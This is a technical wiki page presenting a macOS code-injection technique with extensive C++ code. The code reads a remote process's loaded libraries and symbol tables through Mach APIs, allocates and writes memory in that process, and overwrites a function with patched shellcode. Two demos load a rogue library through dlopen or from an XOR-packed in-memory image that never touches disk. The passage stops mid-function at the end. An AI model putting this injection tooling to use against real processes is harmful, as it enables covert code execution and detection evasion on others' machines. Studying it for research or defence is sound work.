Will Yee edited this page Dec 8, 2017 · 46 revisions

Simple Shellcode Development/Injection on macOS Using Remote Process Symbols

Background/Problem

Due to the way libraries are loaded on macOS, and thanks to its security features, shellcode development can be difficult to accomplish on the platform. On Windows, for example, shellcode developers can leverage Kernel32 symbols in their shellcode knowing that the addresses will translate across processes. We will attempt to remedy this on macOS to reach "feature parity" with Windows in terms of the ability to leverage arbitrary library symbols that will translate across processes when used in shellcode.

Solution

In order to reach "feature parity" with Windows we must go through the following steps:

  1. Find all the loaded libraries in a remote process
  2. Find all the MachO headers of the loaded libraries in a remote process
  3. Parse all the MachO headers of the loaded libraries in a remote process
  4. Find all the remote symbols from remote process libraries
  5. Use the remote symbols in shellcode
  6. Inject shellcode that uses the remote symbols from the remote process
  7. Profit.

Finding All Loaded Libraries in a Remote Process

The first step in this process is to retrieve a list of the libraries loaded by the remote process. This is actually a fairly simple step. But first we need to lay the foundations: which Mach API calls we're going to make and why we're using them.

Mach API

mach_vm_read_overwrite

kern_return_t remoteProcessRead(vm_map_t task, uint64_t address, uint8_t* pBuffer, size_t amountToRead)
{
    mach_vm_size_t dataCnt = 0;
    return mach_vm_read_overwrite(task,
                                  static_cast<mach_vm_address_t>(address),
                                  static_cast<mach_vm_size_t>(amountToRead),
                                  reinterpret_cast<mach_vm_address_t>(pBuffer),
                                  &dataCnt);
}

mach_vm_read_overwrite provides us the capability to read the memory space of a remote process. This will be useful in not just obtaining a list of all the loaded libraries but also for parsing the Mach headers of the libraries loaded by a remote process. We wrap this method in a remoteProcessRead to provide better readability.

mach_vm_write

kern_return_t remoteProcessWrite(vm_map_t task, uint64_t remoteAddress, uint8_t* pBuffer, size_t amountToWrite)
{
    return mach_vm_write(task, 
                         static_cast<mach_vm_address_t>(remoteAddress), 
                         reinterpret_cast<vm_offset_t>(pBuffer), 
                         static_cast<mach_msg_type_number_t>(amountToWrite));
}

mach_vm_write provides us the capability to write to the memory space of a remote process. This will be useful in writing our shellcode and our shellcode arguments over to the remote process. We wrap this method in a remoteProcessWrite to provide better readability.

mach_vm_allocate

kern_return_t remoteProcessAllocate(vm_map_t task, uint64_t& addressOfAllocatedMemory, size_t size)
{
    return mach_vm_allocate(task, &addressOfAllocatedMemory, size, VM_FLAGS_ANYWHERE);
}

mach_vm_allocate provides us the capability to allocate memory in the memory space of a remote process. This will be useful in allocating space for our shellcode arguments and any other additional payloads we want to inject into the remote process. We wrap this method in a remoteProcessAllocate to provide better readability.

Putting it together

Now that we have the basics of the Mach APIs we want to use, let's put them to use. The first bit that we need to do is query the remote process for the address of a metadata structure. This metadata structure will contain information on all the libraries loaded by the remote process.

mach_vm_address_t getImageInfos(vm_map_t targetTask, size_t& size)
{
    task_dyld_info_data_t task_dyld_info;
    mach_msg_type_number_t count = TASK_DYLD_INFO_COUNT;

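    if (task_info(targetTask, TASK_DYLD_INFO, (task_info_t)&task_dyld_info, &count) != KERN_SUCCESS)
    {
        // Without the dyld info we cannot continue, so exit with a failure status
        exit(EXIT_FAILURE);
    }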

    size = task_dyld_info.all_image_info_size;
    return task_dyld_info.all_image_info_addr;
}

Our getImageInfos method will make a call to task_info which asks for the address to the struct dyld_all_image_infos structure. This structure contains an array of struct dyld_image_info that we will need to process.

kern_return_t find_all_binaries(pid_t pid, std::vector<std::pair<std::string, const uintptr_t>>& machHeaderAddresses, 
vm_map_t targetTask)
{
    size_t size = 0;
    mach_vm_address_t allImageInfos = getImageInfos(targetTask, size);
    struct dyld_all_image_infos allImages = { 0 };

    // Missing from the actual demo code, but should happen
    assert(sizeof(allImages) == size);

    remoteProcessRead(targetTask, allImageInfos, reinterpret_cast<uint8_t*>(&allImages), size);

    // Do proper allocations and checks
    ...

    remoteProcessRead(targetTask, 
                      reinterpret_cast<mach_vm_address_t>(allImages.infoArray), 
                      reinterpret_cast<uint8_t*>(pDyldImageInfoArray.get()), 
                      amountToRead);

    ...
}

This means that once we have the address of the struct dyld_all_image_infos contained in the remote process, we need to do two remote process reads: one to retrieve the metadata structure, and another to actually read out the array of struct dyld_image_info. This array of struct dyld_image_info will contain the addresses of the libraries loaded by the remote process.

for (uint32_t j = 0; j < allImages.infoArrayCount; ++j)
{
    const struct dyld_image_info pImageInfo = (const struct dyld_image_info)pDyldImageInfoArray[j];

    ...

    uintptr_t machHeaderAddress = reinterpret_cast<uintptr_t>(pImageInfo.imageLoadAddress);

    //Do some processing with the MachO header or the imageLoadAddress
    ...
}

We will need to iterate over the array grabbing the imageLoadAddress field out of the struct dyld_image_info array element. Since imageLoadAddress is also the address of the MachO header, we will save this off along with the name of the loaded library for later use. Which brings us to our next section...
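The two-step read and the iteration can be tried out without a target process. The following is a minimal sketch, not the demo's code: a byte vector stands in for the remote address space, fakeRemoteRead is a hypothetical replacement for remoteProcessRead, and AllImageInfos and ImageInfo are simplified mirrors of the leading fields of the dyld structures, assuming a 64-bit layout. The path used in makeFakeMemory is made up.

```cpp
#include <cassert>
#include <cstdint>
#include <cstring>
#include <string>
#include <utility>
#include <vector>

// Simplified mirrors of the leading fields of the dyld structures (assumed 64-bit layout).
struct AllImageInfos { uint32_t version; uint32_t infoArrayCount; uint64_t infoArray; };
struct ImageInfo     { uint64_t imageLoadAddress; uint64_t imageFilePath; uint64_t imageFileModDate; };

// Hypothetical stand-in for remoteProcessRead: "memory" plays the remote address space.
bool fakeRemoteRead(const std::vector<uint8_t>& memory, uint64_t address, void* pBuffer, size_t amountToRead)
{
    if (address > memory.size() || amountToRead > memory.size() - address)
        return false;
    std::memcpy(pBuffer, memory.data() + address, amountToRead);
    return true;
}

std::vector<std::pair<std::string, uint64_t>> listImages(const std::vector<uint8_t>& memory,
                                                         uint64_t allImageInfosAddress)
{
    std::vector<std::pair<std::string, uint64_t>> images;

    // Read 1: the metadata structure, which holds the array's address and element count
    AllImageInfos all{};
    if (!fakeRemoteRead(memory, allImageInfosAddress, &all, sizeof(all)))
        return images;

    // Reject counts that could not possibly fit in the address space we were given
    if (all.infoArrayCount == 0 || all.infoArrayCount > memory.size() / sizeof(ImageInfo))
        return images;

    // Read 2: the array of image infos itself
    std::vector<ImageInfo> infos(all.infoArrayCount);
    if (!fakeRemoteRead(memory, all.infoArray, infos.data(), infos.size() * sizeof(ImageInfo)))
        return images;

    for (const ImageInfo& info : infos)
    {
        // The path is a remote pointer too, so it is read byte by byte up to the NUL
        std::string path;
        char c = '\0';
        for (uint64_t a = info.imageFilePath; fakeRemoteRead(memory, a, &c, 1) && c != '\0'; ++a)
            path.push_back(c);
        images.emplace_back(path, info.imageLoadAddress);
    }
    return images;
}

// Builds a tiny fake address space containing one image entry.
std::vector<uint8_t> makeFakeMemory()
{
    std::vector<uint8_t> memory(256, 0);
    const char path[] = "/usr/lib/libexample.dylib";
    std::memcpy(&memory[128], path, sizeof(path));
    ImageInfo info{ 0x100000000ULL, 128, 0 };
    std::memcpy(&memory[64], &info, sizeof(info));
    AllImageInfos all{ 1, 1, 64 };
    std::memcpy(&memory[16], &all, sizeof(all));
    return memory;
}
```

Calling listImages(makeFakeMemory(), 16) yields a single pair holding the made-up path and the load address 0x100000000. Against a real task, each fakeRemoteRead would become a remoteProcessRead whose return value is checked.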

Parsing the Remote Library Headers

There are already plenty of resources for learning how to read/parse the MachO header, so we won't reinvent the wheel here and go over what's already been documented to death. Rather we will focus on what we want from the MachO header in order to achieve our solution.

struct mach_header_64 {
  uint32_t      magic;
  cpu_type_t    cputype;
  cpu_subtype_t cpusubtype;
  uint32_t      filetype;
  uint32_t      ncmds;
  uint32_t      sizeofcmds;
  uint32_t      flags;
  uint32_t      reserved;
};
struct segment_command_64 {
  uint32_t  cmd;
  uint32_t  cmdsize;
  char      segname[16];
  uint64_t  vmaddr;
  uint64_t  vmsize;
  uint64_t  fileoff;
  uint64_t  filesize;
  vm_prot_t maxprot;
  vm_prot_t initprot;
  uint32_t  nsects;
  uint32_t  flags;
};

...

struct symtab_command {
    uint32_t cmd;
    uint32_t cmdsize;
    uint32_t symoff;
    uint32_t nsyms;
    uint32_t stroff;
    uint32_t strsize;
}; 

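In the MachO header we care about three things: the ncmds field, the segname field of each segment load command, and the struct symtab_command. In the case of the segname, we only care about the __TEXT and __LINKEDIT segments. The code uses the 64-bit variants of these structures (struct mach_header_64, struct segment_command_64 and struct nlist_64), as 64-bit processes do.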

void parseSymbolFromMachHeader(std::unique_ptr<uint8_t[]>& pMachHeaderBuffer, uintptr_t remoteMachHeaderAddress, 
vm_map_t targetTask)
{
    ...

    uint32_t nLoadCommands = pMachHeader->ncmds;

    struct segment_command_64* pLinkeditLoadCommand = nullptr;
    struct segment_command_64* pTextLoadCommand     = nullptr;
    struct symtab_command*     pSymtabCommand       = nullptr;

    ...

    for (uint32_t i = 0; i < nLoadCommands; ++i)
    {
        struct load_command* pLoadCommand = reinterpret_cast<struct load_command*>(tempAddress);
    
        switch (pLoadCommand->cmd)
        {
            case LC_SEGMENT_64:
            {
                struct segment_command_64* pCommand = reinterpret_cast<struct segment_command_64*>(tempAddress);
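                // segname is a fixed 16-byte field that is not NUL-terminated when the name uses all 16 bytes
                std::string segname(pCommand->segname, strnlen(pCommand->segname, sizeof(pCommand->segname)));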
            
                if (segname == "__TEXT")
                {
                    pTextLoadCommand = pCommand;
                    if (processSlide == 0)
                    {
                        processSlide = remoteMachHeaderAddress - pCommand->vmaddr;
                    }
                }
            
                if (segname == "__LINKEDIT")
                {
                    pLinkeditLoadCommand = pCommand;
                }
            
                break;
            }
            case LC_SYMTAB:
            {
                // We'll save this for later...
                struct symtab_command* pCommand = reinterpret_cast<struct symtab_command*>(tempAddress);
                pSymtabCommand = pCommand;
                break;
            }
            
            default:
                break;
        }

        ...
    }
}

As shown in the code snippet above, we iterate over the load commands until we fill out the three load commands we care about, the pLinkeditLoadCommand, the pTextLoadCommand, and the pSymtabCommand. Once we have those three load commands filled out, we're ready to find the remote process symbols.
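The load command walk can be exercised on a plain byte buffer. The sketch below makes some assumptions: the structures and constants are redeclared locally to mirror <mach-o/loader.h> so that it builds without the macOS SDK, and FoundCommands, findCommands, appendBytes and makeSyntheticImage are hypothetical names that do not appear in the demo code. Unlike the snippet above, it bounds-checks every cmdsize before advancing.

```cpp
#include <cassert>
#include <cstdint>
#include <cstring>
#include <string>
#include <vector>

// Values and layouts mirror <mach-o/loader.h>; redeclared so the sketch builds anywhere.
constexpr uint32_t kMagic64     = 0xfeedfacf; // MH_MAGIC_64
constexpr uint32_t kLcSymtab    = 0x2;        // LC_SYMTAB
constexpr uint32_t kLcSegment64 = 0x19;       // LC_SEGMENT_64

struct Header64    { uint32_t magic; int32_t cputype; int32_t cpusubtype; uint32_t filetype;
                     uint32_t ncmds; uint32_t sizeofcmds; uint32_t flags; uint32_t reserved; };
struct LoadCommand { uint32_t cmd; uint32_t cmdsize; };
struct Segment64   { uint32_t cmd; uint32_t cmdsize; char segname[16];
                     uint64_t vmaddr; uint64_t vmsize; uint64_t fileoff; uint64_t filesize;
                     int32_t maxprot; int32_t initprot; uint32_t nsects; uint32_t flags; };
struct Symtab      { uint32_t cmd; uint32_t cmdsize; uint32_t symoff; uint32_t nsyms;
                     uint32_t stroff; uint32_t strsize; };

struct FoundCommands
{
    bool hasText = false, hasLinkedit = false, hasSymtab = false;
    Segment64 text{};
    Segment64 linkedit{};
    Symtab symtab{};
};

FoundCommands findCommands(const std::vector<uint8_t>& image)
{
    FoundCommands found;
    Header64 header{};
    if (image.size() < sizeof(header)) return found;
    std::memcpy(&header, image.data(), sizeof(header));
    if (header.magic != kMagic64) return found;

    size_t offset = sizeof(header); // load commands start right after the header
    for (uint32_t i = 0; i < header.ncmds; ++i)
    {
        LoadCommand lc{};
        if (image.size() - offset < sizeof(lc)) break;
        std::memcpy(&lc, image.data() + offset, sizeof(lc));
        if (lc.cmdsize < sizeof(lc) || lc.cmdsize > image.size() - offset) break;

        if (lc.cmd == kLcSegment64 && lc.cmdsize >= sizeof(Segment64))
        {
            Segment64 seg{};
            std::memcpy(&seg, image.data() + offset, sizeof(seg));
            // segname may use all 16 bytes, so cut at the first NUL if there is one
            std::string name(seg.segname, sizeof(seg.segname));
            name = name.substr(0, name.find('\0'));
            if (name == "__TEXT")          { found.text = seg;     found.hasText = true; }
            else if (name == "__LINKEDIT") { found.linkedit = seg; found.hasLinkedit = true; }
        }
        else if (lc.cmd == kLcSymtab && lc.cmdsize >= sizeof(Symtab))
        {
            std::memcpy(&found.symtab, image.data() + offset, sizeof(Symtab));
            found.hasSymtab = true;
        }
        offset += lc.cmdsize; // every load command states its own size
    }
    return found;
}

template <typename T>
void appendBytes(std::vector<uint8_t>& out, const T& value)
{
    const uint8_t* p = reinterpret_cast<const uint8_t*>(&value);
    out.insert(out.end(), p, p + sizeof(T));
}

// Builds a header followed by __TEXT, __LINKEDIT and a symtab command (made-up values).
std::vector<uint8_t> makeSyntheticImage()
{
    Segment64 text{};
    text.cmd = kLcSegment64; text.cmdsize = sizeof(Segment64);
    std::memcpy(text.segname, "__TEXT", 6);
    text.vmaddr = 0x100000000ULL; text.vmsize = 0x4000; text.filesize = 0x4000;

    Segment64 linkedit{};
    linkedit.cmd = kLcSegment64; linkedit.cmdsize = sizeof(Segment64);
    std::memcpy(linkedit.segname, "__LINKEDIT", 10);
    linkedit.vmaddr = 0x100004000ULL; linkedit.fileoff = 0x4000;

    Symtab symtab{ kLcSymtab, sizeof(Symtab), 0x4100, 2, 0x4200, 32 };
    Header64 header{ kMagic64, 0, 0, 0, 3,
                     static_cast<uint32_t>(2 * sizeof(Segment64) + sizeof(Symtab)), 0, 0 };

    std::vector<uint8_t> image;
    appendBytes(image, header);
    appendBytes(image, text);
    appendBytes(image, linkedit);
    appendBytes(image, symtab);
    return image;
}
```

Copying each command out with memcpy rather than casting into the buffer avoids alignment concerns, and lets the result outlive the buffer it was parsed from.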

Finding the Remote Symbols from Remote Process Libraries

Picking up from where we left off in parsing the MachO header, we now have the load commands of the LINKEDIT segment, the TEXT segment and the Symtab load command. Using these three load commands, we can find the symbols for any arbitrary library that's been loaded by a remote process...

void parseSymbolFromMachHeader(std::unique_ptr<uint8_t[]>& pMachHeaderBuffer, uintptr_t remoteMachHeaderAddress, 
vm_map_t targetTask)
{

    // Everything from the previous section
    ...

    if (pLinkeditLoadCommand != nullptr && pTextLoadCommand != nullptr && pSymtabCommand != nullptr)
    {
        uint64_t slide = pLinkeditLoadCommand->vmaddr - pTextLoadCommand->vmaddr - pLinkeditLoadCommand->fileoff;
    
        uint64_t stringTableRemoteAddress = static_cast<uint64_t>(remoteMachHeaderAddress + slide + pSymtabCommand->stroff);
        uint64_t symbolTableRemoteAddress = static_cast<uint64_t>(remoteMachHeaderAddress + slide + pSymtabCommand->symoff);
    
        std::unique_ptr<uint8_t[]> pStringTable = std::make_unique<uint8_t[]>(pSymtabCommand->strsize);
        std::unique_ptr<struct nlist_64[]> pSymbolTable = std::make_unique<struct nlist_64[]>(pSymtabCommand->nsyms);
    
        // We need to dip back into the remote process to read the string area of the symbol table, and the symbols themselves
        kern_return_t kret = remoteProcessRead(targetTask, stringTableRemoteAddress, pStringTable.get(), pSymtabCommand->strsize);
        kret += remoteProcessRead(targetTask, symbolTableRemoteAddress, reinterpret_cast<uint8_t*>(pSymbolTable.get()), sizeof(struct nlist_64) * pSymtabCommand->nsyms);
    
        if (kret == KERN_SUCCESS)
        {
            for (uint32_t i = 0; i < pSymtabCommand->nsyms; ++i)
            {
                struct nlist_64* pSymbol = &pSymbolTable[i];
            
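                // Skip undefined symbols and any name offset that falls outside the string table
                if (pSymbol->n_value != 0 && pSymbol->n_un.n_strx < pSymtabCommand->strsize)
                {
                    uint64_t symbolAddress = static_cast<uint64_t>(pSymbol->n_value + processSlide);
                    char* pSymbolName = reinterpret_cast<char*>(&pStringTable[pSymbol->n_un.n_strx]);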
                
                    std::string symbolName(pSymbolName);
                    symbolsToAddressMap.insert({ symbolName, (uintptr_t)symbolAddress });
                }
            }
        }
    }
}

First we must calculate two values, named processSlide and slide in the code. processSlide is the ASLR slide: the difference between the address at which the Mach header is actually mapped in the remote process and the vmaddr recorded for its __TEXT segment. slide is a different quantity. The symoff and stroff fields of the symtab command are file offsets into the __LINKEDIT segment, so slide (the __LINKEDIT vmaddr, minus the __TEXT vmaddr, minus the __LINKEDIT fileoff) converts those file offsets into offsets from the remote Mach header. We use slide to determine the actual remote addresses of the string table and the symbol table. Once we have both, we read the remote string table and the remote symbol table of the remote library into our own process. Then we iterate over the symbol table and retrieve each symbol's name and its real address, which is its n_value shifted by processSlide. Finally we have both the symbol name and the actual address in the remote process. We save both off for later use.
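A worked example with made-up numbers may help keep the two values apart. In this sketch, Nlist64 mirrors struct nlist_64 from <mach-o/nlist.h>. The helper names (processSlideOf, remoteAddressOfLinkeditOffset, resolveSymbols) and the sample tables are assumptions for illustration, not the demo's code.

```cpp
#include <cassert>
#include <cstdint>
#include <map>
#include <string>
#include <vector>

// Mirrors struct nlist_64 from <mach-o/nlist.h> (n_un.n_strx flattened to n_strx).
struct Nlist64 { uint32_t n_strx; uint8_t n_type; uint8_t n_sect; uint16_t n_desc; uint64_t n_value; };

// ASLR slide: where the header really is, minus where the file says __TEXT starts.
uint64_t processSlideOf(uint64_t remoteHeaderAddress, uint64_t textVmaddr)
{
    return remoteHeaderAddress - textVmaddr;
}

// Converts a file offset inside __LINKEDIT (symoff, stroff) into a remote address.
uint64_t remoteAddressOfLinkeditOffset(uint64_t remoteHeaderAddress, uint64_t textVmaddr,
                                       uint64_t linkeditVmaddr, uint64_t linkeditFileoff,
                                       uint64_t fileOffset)
{
    uint64_t slide = linkeditVmaddr - textVmaddr - linkeditFileoff;
    return remoteHeaderAddress + slide + fileOffset;
}

// Pairs each defined symbol's name with its n_value shifted by the process slide.
std::map<std::string, uint64_t> resolveSymbols(const std::vector<Nlist64>& symbols,
                                               const std::vector<char>& strings,
                                               uint64_t processSlide)
{
    std::map<std::string, uint64_t> resolved;
    for (const Nlist64& symbol : symbols)
    {
        // Skip undefined symbols and name offsets outside the string table
        if (symbol.n_value == 0 || symbol.n_strx >= strings.size())
            continue;

        // Bounded copy: stop at the NUL or at the end of the table, whichever comes first
        std::string name;
        for (size_t i = symbol.n_strx; i < strings.size() && strings[i] != '\0'; ++i)
            name.push_back(strings[i]);

        resolved.insert({ name, symbol.n_value + processSlide });
    }
    return resolved;
}

// Sample string table: offset 1 is "_exit", offset 7 is "_printf".
std::vector<char> sampleStrings()
{
    const char raw[] = "\0_exit\0_printf";
    return std::vector<char>(raw, raw + sizeof(raw));
}

std::vector<Nlist64> sampleSymbols()
{
    return {
        { 1,   0x0f, 1, 0, 0x100001000ULL },  // _exit, defined
        { 7,   0x0f, 1, 0, 0x100002000ULL },  // _printf, defined
        { 7,   0x01, 0, 0, 0 },               // undefined entry, skipped
        { 999, 0x0f, 1, 0, 0x100003000ULL },  // name offset out of range, skipped
    };
}
```

With a header mapped at 0x10a2b0000, a __TEXT vmaddr of 0x100000000, a __LINKEDIT vmaddr of 0x100008000 and a __LINKEDIT fileoff of 0x6000, processSlide is 0xa2b0000 and slide is 0x2000. A symoff of 0x6100 therefore lands at 0x10a2b0000 + 0x2000 + 0x6100 = 0x10a2b8100, which is 0x100 bytes into the slid __LINKEDIT segment, as expected.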

Using Remote Process Symbols in Shellcode

Now that we have a list (actually a map) of addresses and symbols we can begin using them in our shellcode that we wish to inject into the remote process.

int32_t main(int32_t argc, char* argv[])
{
    // Set up
    ...

    find_all_binaries(pid, machHeaderAddresses, task);

    ...

    parseAllSymbols(machHeaderAddresses, task);

    uintptr_t remoteExitAddr   = symbolsToAddressMap["_exit"];
    uintptr_t remotePrintfAddr = symbolsToAddressMap["_printf"];
    uintptr_t remoteMyFunction = symbolsToAddressMap["_MyFunction"];

    ShellcodeArgs args;
    args.pExitProcess = reinterpret_cast<ExitProcess_t>(remoteExitAddr);
    args.pPrintf      = reinterpret_cast<Printf_t>(remotePrintfAddr);
    
    uint64_t remoteAllocatedShellcodeArgs = 0;
    ret += remoteProcessAllocate(task, remoteAllocatedShellcodeArgs, sizeof(ShellcodeArgs));
    ret += remoteProcessWrite(task, remoteAllocatedShellcodeArgs, reinterpret_cast<uint8_t*>(&args), sizeof(ShellcodeArgs));

    ...
}

Injecting Shellcode That Uses Remote Process Symbols

After getting a list of all the remote libraries and their symbols, we fill a ShellcodeArgs structure with pointers. These pointers point to the symbols _exit and _printf that live inside the remote process. We then use remoteProcessAllocate to allocate space for our ShellcodeArgs structure and remoteProcessWrite to copy the contents of our ShellcodeArgs into the remote process's address space.
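One detail worth keeping in mind when pulling addresses out of the map: if symbolsToAddressMap is a std::map or std::unordered_map (an assumption, since its declaration is not shown), operator[] quietly inserts and returns 0 for a name that was never found. A small checked lookup, sketched here with the hypothetical names SymbolMap and lookupSymbol, makes a missing symbol explicit before its address ends up in ShellcodeArgs.

```cpp
#include <cassert>
#include <cstdint>
#include <map>
#include <string>

// Assumed shape of the symbol map; the demo's actual declaration is not shown.
using SymbolMap = std::map<std::string, uintptr_t>;

// Returns true and fills "address" only when the symbol exists with a non-zero address.
// Unlike operator[], find() never inserts a new entry into the map.
bool lookupSymbol(const SymbolMap& symbols, const std::string& name, uintptr_t& address)
{
    auto it = symbols.find(name);
    if (it == symbols.end() || it->second == 0)
        return false;
    address = it->second;
    return true;
}
```

A caller would check the return value for each of _exit, _printf and _MyFunction and stop early if any of them is missing.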

int32_t main(int32_t argc, char* argv[])
{

    std::unique_ptr<uint8_t[]> pPatchedShellCode = std::make_unique<uint8_t[]>(SIZE_OF_SHELLCODE_MAYBE);

    ...

    // Inject ShellcodeArgs into remote process

    ...

    // Handle jump tables for release mode
    uint8_t* pLocalShellcode = (*(uint8_t*)Shellcode == JUMP_INSTR_X86) ? (uint8_t*)((size_t)Shellcode + SIZE_OF_JUMP_INSTR + (*(FunctionRouter*)Shellcode).addr) : (uint8_t*)Shellcode;
    
    // Patch the shell code with the address of the remote args
    memcpy(pPatchedShellCode.get(), pLocalShellcode, SIZE_OF_SHELLCODE_MAYBE);

    const uint32_t I_THINK_THE_SIG_IS_HERE_RANGE = 64;
    for (uint32_t i = 0; i < I_THINK_THE_SIG_IS_HERE_RANGE; ++i)
    {
        if (memcmp(&pPatchedShellCode[i], &g_ShellcodeSignature, sizeof(g_ShellcodeSignature)) == 0)
        {
            // Replace the signature with the correct address pointing to the remote shell code args
            ...
        }
    }

    ...

}

After injecting our ShellcodeArgs structure into the remote process, we must use its address in our shellcode. We do this by looking for a hardcoded signature value in our local shellcode. In order to understand why we do this, we must look at the shellcode itself, which lives in Shellcode.cpp.

void Shellcode(void)
{     
     ShellcodeArgs* pArgs = (ShellcodeArgs*)(SHELLCODEARGS_SIGNATURE);

     pArgs->pPrintf(pArgs->modS, pArgs->helloWorldString);

     pArgs->pExitProcess(-1);
}

The shellcode dereferences pArgs which is a pointer to our ShellcodeArgs structure. We cast a SHELLCODEARGS_SIGNATURE to a ShellcodeArgs* and then use the pointers inside that structure to make calls to printf and exit. This is the code that will execute in the remote process.

So in order for the shellcode to execute correctly, we must replace SHELLCODEARGS_SIGNATURE with the correct address of the ShellcodeArgs structure that we injected into the remote process.
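The replacement itself is a bounded byte search followed by an overwrite. Here is a minimal sketch on a plain byte vector. patchSignature and makeSampleCode are hypothetical names, and the signature value and buffer contents used with them are placeholders rather than the demo's real ones.

```cpp
#include <algorithm>
#include <cassert>
#include <cstdint>
#include <cstring>
#include <vector>

// Looks for the 8-byte signature within the first "searchRange" start positions and
// overwrites it with the remote address. The search never reads past the buffer end.
bool patchSignature(std::vector<uint8_t>& code, uint64_t signature,
                    uint64_t remoteArgsAddress, size_t searchRange)
{
    if (code.size() < sizeof(signature))
        return false;

    const size_t lastStart = code.size() - sizeof(signature);
    const size_t limit = std::min(searchRange, lastStart + 1);

    for (size_t i = 0; i < limit; ++i)
    {
        if (std::memcmp(&code[i], &signature, sizeof(signature)) == 0)
        {
            std::memcpy(&code[i], &remoteArgsAddress, sizeof(remoteArgsAddress));
            return true; // patch the first match only
        }
    }
    return false;
}

// Builds a placeholder buffer: an x86-64 "movabs rax, imm64" carrying the signature, then "ret".
std::vector<uint8_t> makeSampleCode(uint64_t signature)
{
    std::vector<uint8_t> code = { 0x48, 0xb8 };
    code.resize(code.size() + sizeof(signature));
    std::memcpy(&code[2], &signature, sizeof(signature));
    code.push_back(0xc3);
    return code;
}
```

Returning a bool lets the caller stop if the compiler emitted the constant in some other form and the signature was not found, instead of running unpatched code.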

Finally we find an arbitrary symbol in the remote process to overwrite with the contents of our shellcode.

    ...

    // Now mark _MyFunction as RWX and copy over the shell code
    ret += remoteProcessMemoryProtect(task, remoteMyFunction, SIZE_OF_SHELLCODE_MAYBE, false, VM_PROT_ALL);
    
    // Blow away _MyFunction with our shell code
    ret += remoteProcessWrite(task, remoteMyFunction, pPatchedShellCode.get(), SIZE_OF_SHELLCODE_MAYBE);

    ...

We need to use a symbol in order to jump execution to our shellcode. It doesn't really matter how the shellcode gets executed as long as it does. In this example we do this by overwriting a symbol that we know will get called at a later time.

Finally, we can resume the process and let it continue to execute until it hits the shellcode we've injected.

    ...

    // You only yolo once...
    task_resume(task);

    ...

Demos

Demo 2

What It Does

Demo 2 will use the symbols provided by libdyld.dylib that's in a remote process and use _dlopen in order to load and link a library that was not originally loaded by the remote process.

How It's Done

Accomplishing this is not difficult now that we have the symbols of libraries loaded by the remote process. Since libdyld.dylib is loaded by every process, we can use its symbols.

    ...

    find_all_binaries(pid, machHeaderAddresses, task);
    parseAllSymbols(machHeaderAddresses, task);
            
    uintptr_t remoteDlOpenAddr  = symbolsToAddressMap["_dlopen"];       

    ...

    ShellcodeArgs args;
    args.pDlopen            = reinterpret_cast<DlOpen_t>(remoteDlOpenAddr);

    ...

    // Inject shellcode args along with shellcode

    ...

We can adjust the structure of ShellcodeArgs to provide the path to the rogue library we wish to load:

typedef struct _ShellcodeArgs
{
    DlOpen_t pDlopen;

    ...

    char path[76] = "/Users/test/Desktop/hushcon_poc_build/build/Debug/libSharedObjectPayload.so";
    char modS[28] = "Path: %s loaded at 0x%llx\n";
} ShellcodeArgs;

The shellcode which will execute in the remote process will look like this...

void Shellcode(void)
{    
    ShellcodeArgs* pArgs = (ShellcodeArgs*)(SHELLCODEARGS_SIGNATURE);

    void* pLoadedModule = pArgs->pDlopen(pArgs->path, RTLD_NOW);

    pArgs->pPrintf(pArgs->modS, pArgs->path, pLoadedModule);

    while (true) { }
}

Demo 3

What It Does

Demo 3 will use the symbol _NSCreateObjectFileImageFromMemory in the remote process to load a packed library that's injected from the attacking process. This allows the remote process to load and link a rogue library that doesn't exist on disk.

How It's Done

This demo is similar to demo 2, however instead of looking for _dlopen, we will look for _NSCreateObjectFileImageFromMemory, _NSAddressOfSymbol, _NSLookupSymbolInModule, and _NSLinkModule. Once we have all these symbols we can inject our packed binary and record its location in our ShellcodeArgs structure.

    uint64_t remoteAllocatedPackedbinary = 0;
    ret = remoteProcessAllocate(task, remoteAllocatedPackedbinary, g_BinaryDataSize);
    ret += remoteProcessWrite(task, remoteAllocatedPackedbinary, g_BinaryData, g_BinaryDataSize);
    args.pModuleLocation = (void*)remoteAllocatedPackedbinary;
    args.sizeOfModule = g_BinaryDataSize;

Take a look at Bin.cpp in Demo3 in order to see the packed binary data. We've also modified the structure of ShellcodeArgs to accommodate the new arguments:

typedef struct _ShellcodeArgs
{
    Printf_t                 pPrintf;
    NSCreateObjectFile_t     pNSCreateObjectFile;
    NSLookupSymbolInModule_t pNSLookUpSymbol;
    NSLinkModule_t           pNSLinkModule;
    NSAddressOfSymbol_t      pNSAddressOfSymbol;

    void*    pModuleLocation;
    size_t   sizeOfModule;

    char empty[1] = "";
    char symbol[13] = "_DoSomething";

    ...

} ShellcodeArgs;

This new structure contains the function pointers to the symbols that we've looked up, as well as a string naming the symbol that we wish to look up in the packed library.

This is what the shellcode we will be injecting into the remote process looks like:

void Shellcode(void)
{
    ShellcodeArgs* pArgs = (ShellcodeArgs*)(SHELLCODEARGS_SIGNATURE);

    pArgs->pPrintf(pArgs->message);

    // First unpack the module
    uint8_t* pPackedModule = (uint8_t*)pArgs->pModuleLocation;
    for (uint32_t i = 0; i < pArgs->sizeOfModule; ++i)
    {
        pPackedModule[i] = pPackedModule[i] ^ MAGIC_MASK;
    }

    NSObjectFileImage img;

    pArgs->pNSCreateObjectFile(pPackedModule, pArgs->sizeOfModule, &img);

    NSModule unpackedModule = pArgs->pNSLinkModule(img, pArgs->empty, NSLINKMODULE_OPTION_NONE);

    NSSymbol nsDoSomethingSymbol = pArgs->pNSLookUpSymbol(unpackedModule, pArgs->symbol);

    DoSomethingFunction_t pDoSomethingFunction = (DoSomethingFunction_t)(pArgs->pNSAddressOfSymbol(nsDoSomethingSymbol));

    pDoSomethingFunction(5);

    while(true) { }
}

The shellcode first runs our unpacking code over the injected binary located at pModuleLocation. Then it uses the NS* APIs to load and link the library from memory. After that, the address of the symbol _DoSomething is located and the function call is made.
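The unpacking loop is a single-byte XOR, which is its own inverse: applying the same mask twice restores the original bytes. A small round-trip sketch follows. The mask value here is an assumption, since the real MAGIC_MASK is not shown, and xorInPlace and packCopy are hypothetical names.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// Placeholder mask for illustration; the demo's MAGIC_MASK value is not shown.
constexpr uint8_t kHypotheticalMask = 0x5A;

// XORs every byte with the mask. Running it a second time undoes the first pass.
void xorInPlace(uint8_t* pData, size_t size, uint8_t mask)
{
    for (size_t i = 0; i < size; ++i)
    {
        pData[i] = static_cast<uint8_t>(pData[i] ^ mask);
    }
}

// Returns a packed copy, leaving the input untouched (what a build step might do).
std::vector<uint8_t> packCopy(const std::vector<uint8_t>& plain, uint8_t mask)
{
    std::vector<uint8_t> packed = plain;
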